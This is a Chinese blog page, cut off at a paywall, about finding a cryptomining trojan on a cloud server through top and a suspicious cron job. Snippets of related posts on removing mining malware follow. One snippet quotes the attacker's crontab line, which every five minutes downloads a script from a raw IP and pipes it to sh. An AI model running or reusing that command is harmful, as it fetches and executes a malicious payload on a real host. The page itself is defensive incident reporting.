糟糕!服务器被植入挖矿木马,CPU飙升200%

最新推荐文章于 2024-06-03 15:38:24 发布
最新推荐文章于 2024-06-03 15:38:24 发布
阅读量5.9w 收藏 2
点赞数 2
分类专栏: 安全 文章标签: 安全 挖矿 Linux 服务器 病毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yaodunlin/article/details/102929130
版权

此项目是我负责,线上服务器用的是某讯云的,运行着 Tomcat,MySQL,MongoDB,ActiveMQ 等程序。

排查过程

 

我以 150+ 的手速立即打开了服务器,看到 Tomcat 挂了,然后顺其自然的重启,启动过程中直接被 killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果。

 

机智的我打了个 Top,出现以下内容:

这是谁运行的程序?不管三七二十一先杀掉再说,因为它就是 Tomcat 等程序启动不了的元凶。

 

然而并没有什么卵用,过一会再看那个东西又跑出来占 CPU。怀疑是个定时任务:

什么鬼,是个图片?立即访问了一下:

好尴尬,但是心思细腻的我早知道没这么简单,肯定只是伪装,crul 过去是下面的脚本,过程就是在挖矿:

最低0.47元/天 解锁文章
区块链相关安全名词及常见攻击手法
kidteaing的博客
09-06 4464
钱包 Wallet 钱包(Wallet)是一个管理私钥的工具,数字货币钱包形式多样,但它通常包含一个软件客户端,允许使用者通过钱包检查、存储、交易其持有的数字货币。它是进入区块链世界的基础设施和重要入口。 据 SlowMist Hacked 统计,仅 2018 年因“钓鱼”、“第三方劫持”等原因所造成的钱包被黑损失总金额就达 69,160,985 美元,深究根本,除了部分钱包本身对攻击防御的不全面...
我的云服务器植入挖矿木马CPU飙升200%
qq_23930765的博客
11-02 2389
一、什么是挖矿木马 挖矿木马会占用CPU进行超频运算,从而占用主机大量的CPU资源,严重影响服务器上的其他应用的正常运行。黑客为了得到更多的算力资源,一般都会对全网进行无差别扫描,同时利用SSH爆破和漏洞利用等手段攻击主机。 部分挖矿木马还具备蠕虫化的特点,在主机被成功入侵之后,挖矿木马还会向内网渗透,并在被入侵的服务器上持久化驻留以获取最大收益。 挖矿木马的整体攻击流程大致如下图所示: 二、挖矿木马中招特征 挖矿木马会在用户不知情的情况下利用主机的算力进行挖矿,最明显的特征就是主机的CPU被大量消耗,查
服务器植入挖矿木马CPU飙升200%处理方案
weixin_55625082的博客
11-25 2204
服务器植入挖矿木马CPU飙升200%处理方案 1,通过执行top命令,即可在返回结果中看到当时系统的CPU占用率。 top -c 2.检查防火墙iptables规则中是否存在可疑端口 iptables -L -n 查看防火墙规则 vim /etc/sysconfig/iptables 清除防火墙中的可疑地址和 规则 iptables -A INPUT -s 可疑地址 -j DROP 删除入口方向可以地址 iptables
服务器植入挖矿木马程序纪实(第二次)
andyguan01_2的博客
05-07 6550
今天这篇文章的标题是“服务器植入挖矿木马程序纪实(第二次)”,为什么加了个“第二次”,因为之前已经发生过一次(可点此查看:服务器植入挖矿木马程序纪实)。当时只是解决了问题,没有找到根本原因,这次又碰到了,情形和上次略有不同,好在最终找到了原因所在,下面细细说来。 一、发现问题 首先是接到运维同事告知,说服务器有频繁的异常请求,导致端口访问被服务商阻断: 二、解决问题 有了上次的经验,首先查看...
记录腾讯云服务器植入pnscan挖矿病毒折磨的一天
weixin_61077098的博客
06-06 932
pnscan病毒非常狡猾,启动的进程号是动态的,导致不能轻易删除。还有文件删除后没多久又出现了多半是因为定时计划。虽然问题解决了,但并不知道服务器还有没有被修改的命令和一些恶意文件,如果不是很重要的服务器项目,建议备份数据重装服务器,并且不能轻易的把端口号防火墙放开,MySQL、redis等密码也要加大难度。2023年5月22日,建议大家直接重装系统,或者备份的镜像快照回滚。因为今天又出现30多次黑客的攻击,cpu直接100%,根本查不到恶意文件和进程号。所以直接重装!!!
记一次Windows Server 2008 服务器植入挖矿木马处理
a18218401470的博客
01-14 2087
概览 CentOS 6.5转Windows Server 2008 阿里云CES 运行环境:ASP.NET运行环境(2.0/3.5/4.0+MySql5.5) 部署情况:C#部署在IIS7.1上,Python服务部署在Apache2.4,SQL Server,MySql 部署方式:由于IIS与Apache均需要使用80端口,所...
服务器遭遇挖矿怎么办?
最新发布
2401_84466316的博客
06-03 2090
我们先来了解下虚拟货币,以比特币为例,比特币是一种由开源的P2P软件产生的网络虚拟货币,它不依靠特定货币机构发行,通过特定算法的大量计算产生,比特币经济使用整个P2P网络中众多节点构成的分布式数据库来确认并记录所有的交易行为。矿工需要为比特币网络提供的算法来换取比特币,每一个比特币的节点都会收集所有尚未确认的交易,并将其归集到一个数据块中,矿工节点会附加一个随机调整数,并计算前一个数据块的SHA-256散列运算值。
服务器cpu飙高-挖矿木马解决方案记录
以码为梦
10-29 1601
起因:前几天,开发服务器的Jenkins服务一直会出现偶然性的失败,编译代码的线程经常性被kill掉,需要启动好几次才有机会成功。给开发带来诸多不便。受不了啦,于是在一个午饭时间,决定要彻底搞清楚这个问题。 解决问题 首先使用top命令,查看cpu占用。不看不知道啊,看了吓一跳!cpu占用一直在98-100%之间,但是却看不到占用大量内存的进程,此时感觉到问题应该是被挖矿木马入侵了。 于是cr...
-bash这样的木马,你遇到过没?
sqlora的专栏
06-15 6506
第一次遇到如此难搞的病毒木马-bash。 # cat /etc/redhat-release CentOS release 6.7 (Final) # ssh -V OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013 进程和文件清除后,总是会自动起来,然后占用50%CPU netstat-ano|more 用到的命令: sar 1 10 top lsof -p 进程号 ,可以看关联了哪些进程及和那里通信,这里看到会去请求这个外部...
我的服务器挖矿了,原因居然是...
qq_44005305的博客
06-24 1342
比特币系统每隔一段时间就会在节点上生成一个随机代码,互联网中的所有设备都可以寻找这个代码,谁先找到就能获得奖励。而寻找代码的过程,就是挖矿。设备通过计算来筛选出符合条件的随机代码,每找到一个随机代码往往需要上万亿次的哈希运算,CPU通常会被顶到100%。为了降低成本,黑客往往会通过入侵的方式,控制别人的计算机来帮自己挖矿
区块链太火,小心你的服务器被动挖矿
kwame211的博客
05-30 3326
某日,笔者收到 VPS 服务器 CPU 告警,上服务器一看,有个叫做 gpg-agentd 的进程占用大量的 CPU 资源。接着就是常规的排查,IO 情况、网络流量、内存情况、系统日志、crontab 等。当排查到 crontab 时,发现 crontab 有如下的任务:*/5 * * * * curl -fsSL http://84.73.251.157:81/bar.sh | sh */5 *...
一次线上cpu200%的问题排查
6个日的博客
03-07 2756
线上问题排查处理
记一次服务器植入挖矿木马cpu飙升200%解决过程
weixin_33736048的博客
03-29 1124
2019独角兽企业重金招聘Python工程师标准>>> ...
Xmrig挖矿木马排查过程,xmrig占用大量CPU
cf
12-10 4828
4.查找find / -name xmrig 文件,或者程序信息 ps -aux | grep xmrig,找到安装目录并将其删除 rm -rf /root/5.删除定时任务 rm -rf /var/spool/cron。6.删除ssh认证信息 rm -rf ./ssh/8.尽量使用内网链接,不要暴露端口号或者外网地址。1.通过top发现xmrig占用了大量cpu。3.尝试直接kill发现杀死之后又会自动重启。7.原因,有可能是redis等程序导致,2.通过网上搜索发现是挖矿木马
服务器植入挖矿程序 该怎么查杀挖矿病毒
网站安全专家
06-06 9118
阿里云ECS服务器是目前很多网站客户在使用的,可以使用不同系统在服务器中,windows2008 windows2012,linux系统都可以在阿里云服务器中使用,前段时间我们SINE安全收到客户的安全求助,说是收到阿里云的短信提醒,提醒服务器存在挖矿进程,请立即处理的安全告警。客户网站都无法正常的打开,卡的连服务器SSH远程连接都进不去,给客户造成了很大的影响。 随即我们SINE安全工程师...
阿里云服务器挖矿程序minerd入侵的终极解决办法
热门推荐
Java高知社区
01-06 4万+
突然发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了200%多的CPU, 百度了一下,查到几篇文章都有人遇到同样问题,解决的办法:http://blog.youkuaiyun.com/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务。 找不到根源,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉
Linux->服务器挖矿&CPU或内存高负载处理
起而行动,方能平定心中的惶恐
05-28 1355
1.通过linux命令查看cpu内存情况 输入 top 然后按1 对资源占用进行排序 2.查看资源占比较高的进程是否本系统的进程 如果是本系统进程,根据业务系统确定为什么会这样,可能是访问量过大 死循环 定时任务高频执行 excle大量数据导入 等情况 如果非本系统进程,则继续往下看 3.首先进行kill进程号方式处理 执行命令:kill -9 + 进程号 进程kill后如...
记录一次项目CPU飙到200%的解决过程
jinQiangol的博客
06-16 1629
起因是我给某个接口的方法添一个查询数据库的几行代码,如图 结果测试在测试环境发现这个接口调不通了,一直超时,并且调用几次后项目宕了。 一、查看导致CPU飙升的线程 首先需要定位到是服务里的那些线程导致CPU飙升的。具体查找方法: 1、在服务器上使用 top 命令发现服务CPU飙到了200 如图 2、记录CPU较高的pid 使用top -Hp $pid 可以看到具体是哪个线程占用了CPU很高,记下该线程的id。 3、使用 printf '%x' $线程pid 转换为...
服务器植入挖矿程序
Fight_Rain的博客
06-11 6378
在阿里云管控台看到有两台服务器cpu使用率一直在100左右,而平时只有不到1 解决1: 连到服务器,top命令发现wipefs进程占用大量cpu资源,先kill掉该进程,再删除一些文件,具体参考https://www.cnblogs.com/liuchuyu/p/7490338.html,删除时可能遇到Operation not permitted,一般是文件属性为 —i———-,先cha...
解决服务器应用CPU占用率持续100%的方法探讨
8. **恶意代码**:在一些安全事件中,应用程序可能被植入了恶意代码,例如挖矿木马,它会利用CPU资源进行加密货币的挖掘。 解决CPU占用过高问题的步骤通常包括: 1. **查看系统性能指标**:使用命令行工具(如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值